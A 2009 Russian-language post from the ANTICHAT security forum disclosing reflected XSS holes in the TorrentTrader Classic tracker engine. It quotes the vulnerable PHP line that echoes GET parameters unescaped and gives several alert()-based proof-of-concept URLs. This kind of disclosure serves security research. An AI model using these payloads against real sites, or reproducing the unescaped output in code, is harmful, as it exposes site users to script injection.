Трекер-движок TorrentTrader

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

Трекер-движок TorrentTrader

12.08.2009, 17:31

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Трекер-движок TorrentTrader

Офф сайт = http://www.torrenttrader.org/

версия TorrentTrader Classic v1.09

XSS
получается из за не достаточной обработки данных

Код:

print("<p>" . SORT_BY . " <a href=" . $_SERVER[PHP_SELF] . "?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=votes>" . VOTES . "</a>, <a href=". $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=request>Request Name</a>, or <a href=" . $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=added>" . DATE_ADDED . "</a>.</p>");

viewrequests.php?category=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E

viewrequests.php?category=&filter=%3E%3Cscript%3Ea lert(/Hi/)%3C/script%3E&sort=votes

версия TorrentTrader Classic v2.04

XSS

torrents.php?parent_cat=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E

p.S по структуре файлов похож на TBDev

Последний раз редактировалось HAXTA4OK; 12.08.2009 в 20:42..